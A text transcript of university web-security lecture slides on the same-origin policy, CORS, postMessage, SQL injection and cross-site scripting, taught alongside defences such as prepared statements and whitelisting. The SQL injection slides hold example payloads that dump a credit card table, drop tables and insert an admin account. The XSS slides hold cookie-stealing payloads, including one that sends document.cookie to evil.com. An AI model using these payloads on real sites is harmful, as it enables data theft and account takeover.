powerpoint presentation - university of washington...application-level vulnerabilities cross-site...
TRANSCRIPT
![Page 1: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/1.jpg)
CSE484/CSE584
BASIC WEB SECURITY MODEL
Dr. Benjamin Livshits
![Page 2: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/2.jpg)
Isolation
![Page 3: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/3.jpg)
Frame and IFRAME
Window may contain frames from different sources Frame: rigid division as part of frameset
iFrame: floating inline frame
iFrame example
Why use frames? Delegate screen area to content from another source
Browser provides isolation based on frames
Parent may work even if frame is broken
<iframe src="hello.html" width=450 height=100>
If you can see this, your browser doesn't understand IFRAME.
</iframe>
![Page 4: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/4.jpg)
Floating IFRAMEs4
![Page 5: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/5.jpg)
At Least A Handful of IFRAMEs is Common
5
![Page 6: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/6.jpg)
Windows Interact
6
![Page 7: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/7.jpg)
Web vs. OS: An Analogy
Primitives
System calls
Processes
Disk
Principals: Users
Low-level vulnerabilities
Buffer overflow
Other memory issues
Primitives
Document object model (DOM)
Frames
Cookies / localStorage
Principals: “Origins”
Application-level vulnerabilities
Cross-site scripting
Cross-site request forgery
SQL injection
etc.
Operating system Web browser
![Page 8: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/8.jpg)
Side-by-Side vs. Embedded in a Page
Two independent windows
…or frames
…or browser instances
Interesting interactions
8
![Page 9: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/9.jpg)
Frame Embedding9
![Page 10: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/10.jpg)
Browser Security Mechanism
Each frame of a page has an origin Origin = <protocol://host:port>
Frame can access its own origin Network access, Read/write DOM, Storage (cookies)
Frame cannot access data associated with a different origin
A A
B
B
A
![Page 11: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/11.jpg)
Origin Determination: http://www.example.com
11
![Page 12: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/12.jpg)
SOP For the DOM
With no additional qualifiers, the term
"same-origin policy" most commonly refers
to a mechanism that governs the ability for
JavaScript and other scripting languages to
access DOM properties and methods across
domains (reference). In essence, the model
boils down to this three-step decision
process
1) If protocol, host name, port number for
two interacting pages match, access is
granted with no further checks
2) Any page may set document.domain
parameter to a right-hand, fully-qualified
fragment of its current host name (e.g.,
foo.bar.example.com may set it to
example.com, but not apple.com). If two
pages explicitly and mutually set their
respective document.domain parameters
to the same value, and the remaining same-
origin checks are satisfied, access is granted.
3) If neither of the above conditions is
satisfied, access is denied.
12
![Page 13: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/13.jpg)
Domain Relaxation
Origin: <scheme, host, (port), hasSetDomain>
Try document.domain = document.domain
www.facebook.com
www.facebook.comwww.facebook.com chat.facebook.com
chat.facebook.com
facebook.comfacebook.com
![Page 14: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/14.jpg)
SOP Policy For Cookies: It’s Complicated
14
https://code.google.com/p/browsersec/wiki/Part2
![Page 15: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/15.jpg)
Script Inclusion Excluded From SOP
www.example.com:
<script src=“http://ajax.aspnetcdn.com/ajax/jquery.validate/1.11.0/jquery.validate.min.js”>
</script>
• Script has privileges of imported page, NOT source server.
• Can script other pages in this origin, load more scripts
• Other forms of importing
Why is this a good idea?
Why is this a bad idea?
![Page 16: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/16.jpg)
SOP: More Details16
Same-origin policy for DOM access
Same-origin policy for XMLHttpRequest
Same-origin policy for cookies
Same-origin policy for Flash
Same-origin policy for Java
Same-origin policy for Silverlight
Same-origin policy for Gears
Origin inheritance rules
![Page 17: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/17.jpg)
Remote Scripting and Cross-Domain Access
![Page 18: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/18.jpg)
Additional Mechanisms
Cross-origin network requests
Access-Control-Allow-Origin: <list of domains>
Access-Control-Allow-Origin: *
Cross-origin client side communication
Client-side messaging via navigation (old browsers)
postMessage (modern browsers)
Site BSite A
Site A context Site B context
![Page 19: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/19.jpg)
Cross-Domain Request
For example, suppose web content on domain http://foo.example.com wishes to invoke content on domain http://bar.other.com
Code of this sort might be used within JavaScript deployed on http://foo.example.com
19
![Page 20: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/20.jpg)
Cross-Domain GET Request20
Firefox headers sent out as part of the request
the resource can be accessed by any domain in
a cross-site manner
![Page 21: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/21.jpg)
Pre-Flighting21
Allows to pre-flight cross-domain requests to see if
they are allowed
Which methods are supported by the domain
![Page 22: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/22.jpg)
Communication
![Page 23: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/23.jpg)
Client-Side window.postMessage API23
Client-side communication between principals (domains) that don’t necessarily trust each other
Add a contact
Share contacts
![Page 24: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/24.jpg)
Syntax of postMessage
frames[0].postMessage("Attack at dawn!",
"http://b.com/");
window.addEventListener("message", function (e) {
if (e.origin == "http://a.com") {
... e.data ... }
}, false);
Attack at dawn!
![Page 25: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/25.jpg)
Why Include “targetOrigin”?
What goes wrong?frames[0].postMessage("Attack at dawn!");
Messages sent to frames, not principals
When would this happen?
25
![Page 26: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/26.jpg)
Summary
Http
Rendering content
Cookies
Isolation
Communication
Navigation
Security User Interface
Frames and frame busting
![Page 27: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/27.jpg)
Source: http://xkcd.com/327/
Break…27
![Page 28: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/28.jpg)
Web Application Scenario28
HTTP REQUEST
HTTP RESPONSE
client server
![Page 29: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/29.jpg)
Memory Exploits and Web App Vulnerabilities Compared
Format string vulnerabilities Generally, better, more
restrictive APIs are enough
Simple static tools help
SQL injection Generally, better, more
restrictive APIs are enough
Simple static tools help
29
Buffer overruns Stack-based Return-to-libc, etc. Heap-based Heap spraying attacks Requires careful
programming or memory-safe languages
Cross-site scripting
XSS-0, -1, -2, -3
Requires careful programming
![Page 30: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/30.jpg)
SQL Injection Attacks
Attacks a particular site, not (usually) a particular user
Affect applications that use untrusted input as part of an SQL query to a back-end database
Specific case of a more general problem: using untrusted input in commands
30
![Page 31: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/31.jpg)
SQL Injection: Example
Consider a browser form, e.g.:
When the user enters a number and clicks the button, this generates an http request like
https://www.pizza.com/show_orders?month=10
31
![Page 32: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/32.jpg)
Example Continued…
Upon receiving the request, a Java program might produce an SQL query as follows:
A normal query would look like:
sql_query
= "SELECT pizza, quantity, order_day "
+ "FROM orders "
+ "WHERE userid=" + session.getCurrentUserId()
+ " AND order_month= "
+ request.getParameter("month");
SELECT pizza, quantity, order_day
FROM orders
WHERE userid=4123
AND order_month=10
32
![Page 33: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/33.jpg)
Example Continued…
What if the user makes a modified http request:https://www.pizza.com/show_orders?month=0%20OR%201%3D1
(Parameters transferred in URL-encoded form, where meta-characters are encoded in ASCII)
This has the effect of settingrequest.getParameter(“month”)
equal to the string0 OR 1=1
33
![Page 34: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/34.jpg)
Example Continued
So the script generates the following SQL query:
Since AND takes precedence over OR, the above always evaluates to TRUE
The attacker gets every entry in the database!
SELECT pizza, quantity, order_day
FROM orders
WHERE userid=4123
AND order_month=0 OR 1=1(
)
34
![Page 35: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/35.jpg)
Even Worse…
Craft an http request that generates an SQL query like the following:
Attacker gets the entire credit card database as well!
SELECT pizza, quantity, order_day
FROM orders
WHERE userid=4123
AND order_month=0 OR 1=0
UNION SELECT cardholder, number, exp_date
FROM creditcards
35
![Page 36: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/36.jpg)
More Damage…
SQL queries can encode multiple commands, separated by ‘;’
Craft an http request that generates an SQL query like the following:
Credit card table deleted! DoS attack
SELECT pizza, quantity, order_day
FROM orders
WHERE userid=4123
AND order_month=0 ;
DROP TABLE creditcards
36
![Page 37: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/37.jpg)
More Damage…
Craft an http request that generates an SQL query like the following:
User (with chosen password) entered as an administrator!
Database owned!
SELECT pizza, quantity, order_day
FROM orders
WHERE userid=4123
AND order_month=0 ;
INSERT INTO admin VALUES (‘hacker’, ...)
37
![Page 38: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/38.jpg)
May Need to be More Clever…
Consider the following script for text queries:
Previous attacks will not work directly, since the commands will be quoted
But easy to deal with this…
sql_query
= "SELECT pizza, quantity, order_day "
+ "FROM orders "
+ "WHERE userid=" + session.getCurrentUserId()
+ " AND topping= ‘ "
+ request.getParameter(“topping") + “’”
38
![Page 39: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/39.jpg)
Example Continued…
Craft an http request where request.getParameter(“topping”)
is set toabc’; DROP TABLE creditcards; --
The effect is to generate the SQL query:
(‘--’ represents an SQL comment)
SELECT pizza, quantity, order_day
FROM orders
WHERE userid=4123
AND toppings=‘abc’;
DROP TABLE creditcards ; --’
39
![Page 40: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/40.jpg)
Mitigation? Solutions?
Blacklisting
Whitelisting
Encoding routines
Prepared statements/bind variables
Mitigate the impact of SQL injection
40
![Page 41: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/41.jpg)
Blacklisting?
I.e., searching for/preventing ‘bad’ inputs
E.g., for previous example:
…where kill_chars() deletes, e.g., quotes and semicolons
sql_query
= "SELECT pizza, quantity, order_day "
+ "FROM orders "
+ "WHERE userid=" + session.getCurrentUserId()
+ " AND topping= ‘ "
+ kill_chars(request.getParameter(“topping"))
+ “’”
41
![Page 42: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/42.jpg)
Drawbacks of Blacklisting
How do you know if/when you’ve eliminated all possible ‘bad’ strings? If you miss one, could allow successful attack
Does not prevent first set of attacks (numeric values) Although similar approach could be used, starts to get
complex!
May conflict with functionality of the database E.g., user with name O’Brien
42
![Page 43: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/43.jpg)
Whitelisting
Check that user-provided input is in some set of values known to be safe
E.g., check that month is an integer in the right range
If invalid input detected, better to reject it than to try to fix it
Fixes may introduce vulnerabilities
Principle of fail-safe defaults
43
![Page 44: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/44.jpg)
Prepared Statements/bind Variables
Prepared statements: static queries with bind variables
Variables not involved in query parsing
Bind variables: placeholders guaranteed to be data in correct format
44
![Page 45: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/45.jpg)
A SQL Injection Example in Java
PreparedStatement ps =
db.prepareStatement(
"SELECT pizza, quantity, order_day "
+ "FROM orders WHERE userid=?
AND order_month=?");
ps.setInt(1, session.getCurrentUserId());
ps.setInt(2,
Integer.parseInt(request.getParameter("month")));
ResultSet res = ps.executeQuery();
Bind variables
45
![Page 46: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/46.jpg)
There’s Even More46
Practical SQL Injection: Bit by Bit
Teaches you how to reconstruct entire databases
Overall, SQL injection is easy to fix by banning certain APIs
Prevent queryExecute-type calls with non-constant arguments
Very easy to automate
See a tool like LAPSE that does it for Java
![Page 47: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/47.jpg)
SQL Injection in the Real World
CardSystems was a major credit card processing company
Put out of business by a SQL injection attack
Credit card numbers stored unencrypted
Data on 263,000 accounts stolen
43 million identities exposed
![Page 48: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/48.jpg)
Taxonomy of XSS
XSS-0: client-side
XSS-1: reflective
XSS-2: persistent
48
![Page 49: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/49.jpg)
What is at the Root of the XSS Problem?
49
![Page 50: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/50.jpg)
Web Attacker3
Controls malicious website (attacker.com) Can even obtain SSL/TLS certificate for his site
User visits attacker.com – why? Phishing email Enticing content Search results Placed by ad network Blind luck …
Attacker has no other access to user machine!
![Page 51: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/51.jpg)
Cross-site Scripting51
If the application is not careful to encode its output data, an attacker can inject script into the outputout.writeln(“<div>”);
out.writeln(req.getParameter(“name”));
out.writeln(“</div>”);
name: <script>…; xhr.send(document.cookie);</script>
![Page 52: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/52.jpg)
XSS: Baby Steps52
http://example.com/test.php?color=red&background=pink.
![Page 53: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/53.jpg)
XSS: Simple Things are Easy53
http://example.com/test.php?color=green&background=</style><script>document.write(String.fromCharCode(88,83,83))</script>
![Page 54: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/54.jpg)
XSSED.org: In Search of XSS54
![Page 55: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/55.jpg)
One of the Reports on XSSED55
![Page 56: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/56.jpg)
Repro56
![Page 57: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/57.jpg)
57
2006 Example Vulnerability
![Page 58: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/58.jpg)
2006 Example Vulnerability
1) Attackers contacted users via email and fooled them into accessing a particular URL hosted on the legitimate PayPal website
2) Injected code redirected PayPal visitors to a page warning users their accounts had been compromised
3) Victims were then redirected to a phishing site and prompted to enter sensitive financial data
Source: http://www.acunetix.cz/news/paypal.htm
![Page 59: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/59.jpg)
Consequences of XSS59
Cookie theft: most common http://host/a.php?variable="><script>document.location='http://www.evil.com/cgi-bin/cookie.cgi? '%20+document.cookie</script>
But also Setting cookies
Injecting code into running application
Injecting a key logger
etc.
![Page 60: PowerPoint Presentation - University of Washington...Application-level vulnerabilities Cross-site scripting Cross-site request forgery SQL injection etc. Operating system Web browser](https://reader033.vdocument.in/reader033/viewer/2022060905/60a060add8fead2ed2758768/html5/thumbnails/60.jpg)
XSS Defenses 60
Simple ones
Compare IP address and cookie
Cookie HttpOnly attribute
There’s much more to be covered later